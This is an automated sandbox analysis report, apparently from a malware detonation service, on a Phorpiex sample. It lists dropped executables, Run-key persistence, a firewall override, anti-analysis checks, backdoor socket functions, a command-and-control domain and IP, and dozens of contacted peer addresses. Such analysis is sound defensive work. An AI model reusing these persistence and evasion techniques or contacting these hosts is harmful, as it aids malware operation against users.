Source: unknown Process created: C:\Users\user\sysvratrel.exe "C:\Users\user\sysvratrel.exe"
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Process created: C:\Users\user\AppData\Local\Temp\135143440.exe C:\Users\user\AppData\Local\Temp\135143440.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Process created: C:\Users\user\AppData\Local\Temp\1682018248.exe C:\Users\user\AppData\Local\Temp\1682018248.exe Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\sysvratrel.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\sysvratrel.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\sysvratrel.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\sysvratrel.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\sysvratrel.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\sysvratrel.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\sysvratrel.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll Jump to behavior
Source: 957C4XK6Lt.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 957C4XK6Lt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 957C4XK6Lt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 957C4XK6Lt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 957C4XK6Lt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 957C4XK6Lt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Code function: 0_2_00531A91 push ecx; ret 0_2_00531AA4

Persistence and Installation Behavior
barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown Executable created and started: C:\Windows\sysvratrel.exe
Drops PE files
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File created: C:\Users\user\AppData\Local\Temp\135143440.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Users\user\AppData\Local\Temp\1682018248.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Windows\sysvratrel.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Users\user\sysvratrel.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Users\user\sysvratrel.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Windows\sysvratrel.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File created: C:\Users\user\sysvratrel.exe Jump to dropped file
Modifies existing windows services
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Settings Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File opened: C:\Users\user\AppData\Local\Temp\135143440.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File opened: C:\Users\user\AppData\Local\Temp\135143440.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe File opened: C:\Users\user\AppData\Local\Temp\1682018248.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040CF30 3_2_0040CF30
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040CF30 5_2_0040CF30
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040CF30 8_2_0040CF30
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\sysvratrel.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\sysvratrel.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Window / User API: threadDelayed 6250 Jump to behavior
Found evaded block containing many API calls
Source: C:\Users\user\sysvratrel.exe Evaded block: after key decision
Source: C:\Users\user\sysvratrel.exe Evaded block: after key decision
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\sysvratrel.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\sysvratrel.exe Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\sysvratrel.exe API coverage: 0.9 %
Source: C:\Users\user\sysvratrel.exe API coverage: 0.9 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040CF30 3_2_0040CF30
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040CF30 8_2_0040CF30
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 2304 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756 Thread sleep count: 6250 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe TID: 6756 Thread sleep time: -12500000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 3_2_00406650
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 3_2_00406510
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 5_2_00406650
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 5_2_00406510
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 8_2_00406650
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 8_2_00406510
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect, 3_2_00402020
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Thread delayed: delay time: 30000 Jump to behavior
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000920000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPx
Source: C:\Users\user\AppData\Local\Temp\135143440.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\135143440.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\sysvratrel.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\sysvratrel.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\sysvratrel.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\sysvratrel.exe API call chain: ExitProcess graph end node
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Code function: 0_2_00531BC8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 0_2_00531BC8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040A120 GetProcessHeaps, 3_2_0040A120
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Code function: 0_2_00531BC8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess, 0_2_00531BC8
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: GetLocaleInfoA,strcmp, 3_2_0040E970
Source: C:\Users\user\sysvratrel.exe Code function: GetLocaleInfoA,strcmp, 5_2_0040E970
Source: C:\Users\user\sysvratrel.exe Code function: GetLocaleInfoA,strcmp, 8_2_0040E970
Source: C:\Users\user\Desktop\957C4XK6Lt.exe Code function: 0_2_00531AF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00531AF8

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride Jump to behavior

Remote Access Functionality
barindex
Yara detected Phorpiex
Source: Yara match File source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread, 3_2_00401470
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect, 3_2_00402020
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket, 3_2_0040D950
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread, 3_2_004013B0
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread, 5_2_00401470
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect, 5_2_00402020
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket, 5_2_0040D950
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread, 5_2_004013B0
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread, 8_2_00401470
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect, 8_2_00402020
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket, 8_2_0040D950
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_004013B0 CreateEventA,socket,bind,CreateThread, 8_2_004013B0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430850 Sample: 957C4XK6Lt.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 37 twizt.net 2->37 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 7 other signatures 2->53 8 957C4XK6Lt.exe 16 2->8         started        13 sysvratrel.exe 2->13         started        15 sysvratrel.exe 2->15         started        17 sysvratrel.exe 2->17         started        signatures3 process4 dnsIp5 45 twizt.net 185.215.113.66, 49710, 49713, 49714 WHOLESALECONNECTIONSNL Portugal 8->45 33 C:\Users\user\AppData\Local\...\135143440.exe, PE32 8->33 dropped 35 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 8->35 dropped 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->69 19 135143440.exe 9 20 8->19         started        71 Antivirus detection for dropped file 13->71 73 Multi AV Scanner detection for dropped file 13->73 75 Found evasive API chain (may stop execution after checking mutex) 13->75 77 3 other signatures 13->77 file6 signatures7 process8 dnsIp9 39 189.158.148.85, 40500 UninetSAdeCVMX Mexico 19->39 41 197.148.34.173, 40500 TVCaboAngolaAO Angola 19->41 43 57 other IPs or domains 19->43 27 C:\Windows\sysvratrel.exe, PE32 19->27 dropped 29 C:\Users\user\sysvratrel.exe, PE32 19->29 dropped 31 C:\Users\user\AppData\...\1682018248.exe, PE32 19->31 dropped 55 Antivirus detection for dropped file 19->55 57 Multi AV Scanner detection for dropped file 19->57 59 Found evasive API chain (may stop execution after checking mutex) 19->59 61 7 other signatures 19->61 24 1682018248.exe 19->24         started        file10 signatures11 process12 signatures13 63 Antivirus detection for dropped file 24->63 65 Multi AV Scanner detection for dropped file 24->65 67 Machine Learning detection for dropped file 24->67
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.236.226.70
 unknown Uzbekistan
34718 TPSUZ-ASUZ true
91.202.233.141
 unknown Russian Federation
9009 M247GB false
82.114.186.50
 unknown Yemen
30873 PTC-YEMENNETYE true
95.107.12.43
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
2.190.224.61
 unknown Iran (ISLAMIC Republic Of)
12880 DCI-ASIR true
156.212.34.122
 unknown Egypt
8452 TE-ASTE-ASEG false
134.35.173.140
 unknown Yemen
30873 PTC-YEMENNETYE true
181.114.188.143
 unknown Bolivia
27839 ComtecoLtdaBO true
82.194.11.2
 unknown Azerbaijan
29584 AZEDUNET-ASAZ true
195.158.15.3
 unknown Uzbekistan
8193 BRM-ASUZ false
189.158.148.85
 unknown Mexico
8151 UninetSAdeCVMX true
92.46.174.254
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ true
134.35.74.170
 unknown Yemen
30873 PTC-YEMENNETYE true
85.113.19.18
 unknown Kyrgyzstan
12997 KTNETKG true
46.35.86.48
 unknown Yemen
30873 PTC-YEMENNETYE true
109.72.204.86
 unknown Iran (ISLAMIC Republic Of)
51554 POGCIR false
5.200.190.214
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR true
5.63.93.62
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ false
5.233.222.244
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR true
239.255.255.250
 unknown Reserved
unknown unknown false
5.200.152.6
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR true
128.65.176.18
 unknown Iran (ISLAMIC Republic Of)
43754 ASIATECHIR true
212.112.112.84
 unknown Kyrgyzstan
12764 AKNET-ASKG true
31.186.49.163
 unknown Kyrgyzstan
12764 AKNET-ASKG true
120.237.99.181
 unknown China
56040 CMNET-GUANGDONG-APChinaMobilecommunicationscorporation true
5.232.84.160
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false
95.156.103.50
 unknown Russian Federation
